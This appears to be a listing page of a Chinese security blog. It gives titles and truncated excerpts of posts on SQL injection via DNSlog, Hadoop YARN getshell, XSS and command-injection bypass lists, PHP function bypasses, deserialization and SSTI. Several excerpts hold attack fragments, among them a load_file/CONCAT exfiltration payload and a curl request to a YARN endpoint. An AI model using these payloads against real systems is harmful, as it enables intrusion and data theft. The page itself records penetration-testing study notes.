3569

What's the fuck ?!

毕业设计-信息搜集

这,注定是一篇水文。但是一吐为快。 之前看某T的习惯,每周刷新一遍资产,重新看一下目标,反思再挖洞。然后想着,手动太麻烦,等了一年半,写毕设了,当作自己的代码来写 .... 刚才,磨磨蹭蹭年前开始写的,到现在,基础功能全部加上,基本上调试能用,但是个别功能(socket 扫端口)准确率只有...

2019-03-12 23:53:14

阅读数 43

评论数 0

Dnslog在SQL注入 & 四种数据库

https://www.anquanke.com/post/id/98096 mysql http://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(CONCAT('\\',(SELECT hex(pass) FROM test...

2019-03-07 16:27:10

阅读数 84

评论数 0

Hadoop 8088 Getshell

工作遇到了,有幸测试成功,记录下。 首先获取 application-id curl -v -X POST 'http://target:8088/ws/v1/cluster/apps/new-application' 1.json { "am-containe...

2019-02-28 00:50:57

阅读数 73

评论数 0

XSS Bypass List

http://drops.wooyun.org/tips/845  这个就不知道 出处了 ....   刚用到了里边的几个,稍微修改下,成功绕过WAF ~ Mark 一下 ~ 0x00 背景 本文来自于《Modern Web Application Firewalls Fingerprin...

2019-02-22 11:28:13

阅读数 60

评论数 0

命令注入 bypass list

真的全啊,备份下。原文 https://xz.aliyun.com/t/3918   命令注入 OS命令注入(也称为shell注入)是一种web安全漏洞,它允许攻击者在运行应用程序的服务器上执行任意操作系统(OS)命令,通常会完全破坏应用程序及其所有数据。通常,攻击者可以利用OS命令注入漏...

2019-02-12 17:10:25

阅读数 106

评论数 0

PHP - 变量覆盖 - extract()

https://chybeta.github.io/2018/11/29/phpcms-2008-type-php-%E5%89%8D%E5%8F%B0%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5getshell%E6%BC%8F%E6%B4%9E%E5%88%86%E...

2018-12-21 11:24:03

阅读数 135

评论数 0

绕过PHP disable_functions

https://lab.wallarm.com/rce-in-php-or-how-to-bypass-disable-functions-in-php-installations-6ccdbf4f52bb 需要翻译,我自己看了一半,感觉太慢,还是用了Google翻译 Orz   简而言之,...

2018-12-13 13:52:47

阅读数 239

评论数 0

WSDL 文件测试

https://www.cnblogs.com/xueli/p/6145211.html https://www.cnblogs.com/xueli/p/9681526.html 先用python大致看看,之后在考虑工具吧   输出有什么功能 >&...

2018-12-12 10:05:56

阅读数 139

评论数 0

ElasticSearch 未授权访问利用

学弟找到个自己学校的 es 未授权,尝试利用一波,学习下如何使用 :) http://www.ruanyifeng.com/blog/2017/08/elasticsearch.html http://blog.51cto.com/feelmanc/1250430 上边文档写的挺不错,我基本...

2018-12-05 23:12:11

阅读数 547

评论数 0

[ssocks] 内网 socks 代理

emmm。有了一台 linux 计划任务反弹的shell,socks 搞内网 ~   使用方法 就跟 rcsocks 的 help 一样, rsscoks 在target上运行,rcsocks 在 hacker 上运行 // 我用 use 标出来了 [root@target src]# ....

2018-12-05 10:52:33

阅读数 325

评论数 0

PHP - 函数绕过 - escapeshell[arg|cmd]()

https://www.anquanke.com/post/id/107336 发现有时候,只有用到相关东西(有需求),才会发现,哎呀,写的真好。 escapeshellarg 1.确保用户只传递一个参数给命令 2.用户不能指定更多的参数一个 3.用户不能执行不同的命令 escapes...

2018-11-30 11:38:01

阅读数 146

评论数 0

PHP - 函数绕过 - preg_match()

http://f1sh.site/2018/11/25/code-breaking-puzzles%e5%81%9a%e9%a2%98%e8%ae%b0%e5%bd%95/   待绕过目标如下 <?php echo preg_match('/<\...

2018-11-29 15:04:40

阅读数 729

评论数 0

PHP - 代码执行 - create_function()

https://paper.seebug.org/94/ create_function() 大致流程如下 1. 获取参数, 函数体; 2. 拼凑一个”function __lambda_func (参数) { 函数体;} “的字符串; 3. eval; 4. 通过__lambda_f...

2018-11-29 13:04:13

阅读数 328

评论数 0

APP漏洞挖掘工具篇 - Drozer

https://mp.weixin.qq.com/s?__biz=MzUyNTk1NDQ3Ng==&mid=2247483830&idx=1&sn=ef4bdcdca99d2928d5a0c3ae246b007f&am...

2018-11-27 10:49:48

阅读数 422

评论数 0

phar 反序列化本地测试

https://xz.aliyun.com/t/2715 看了上边的文章,然后根据他的代码来复现的。   众多文件操作函数能反序列化在于使用了 phar_parse_url,之后有调用到 phar_var_unserialize。 生成 phar代码:  test.txt随便写就行,没必要...

2018-10-24 16:24:27

阅读数 168

评论数 0

Phar与Stream Wrapper造成PHP RCE的深入挖掘

https://blog.zsxsoft.com/post/38 今年的HITCON打完了,沉迷写前端搞Nextjs骚操作的我成功爆0(雾),不想写前端了.jpg。 先跑个题。 HITCON 2016上,orange 出了一道PHP反序列化。 HITCON 2017上,orange 出了一道P...

2018-10-24 12:17:47

阅读数 116

评论数 0

在域控中滥用DNSAdmins权限的危害

https://xz.aliyun.com/t/2932 翻译自:http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html ...

2018-10-24 10:28:31

阅读数 66

评论数 0

Java反序列化漏洞分析

https://xz.aliyun.com/t/136  写的挺详细的,大致了解了,整个流程,有点事,之后在细跟 目录 1. 背景 2. 认识java序列化与反序列化 3. 理解漏洞的产生 4. POC构造 5. 实际漏洞环境测试 6. 总结 背景   2015年11月6日FoxGlov...

2018-10-22 17:55:30

阅读数 71

评论数 0

Java RMI & 反序列化 详细介绍

https://blog.csdn.net/LeeHDsniper/article/details/71599504 Java RMI 一直只是知道,了解过,还是很迷,耐心看了一篇文章,了解了RMI究竟是什么(虽然都知道他是远程调用用到的) ,还有大致的利用思路。 因为没办法复制图片,后边的直接...

2018-10-17 18:46:00

阅读数 114

评论数 0

CTF SSTI 一些记录

https://ctftime.org/writeup/10895 https://www.xmsec.cc/ssti-and-bypass-sandbox-in-jinja2/   ▼▼▼Shrine(Web:solved 58/810=7.1%)▼▼▼ This writeup is ...

2018-10-13 11:31:21

阅读数 580

评论数 0

提示
确定要删除当前文章?
取消 删除
关闭
关闭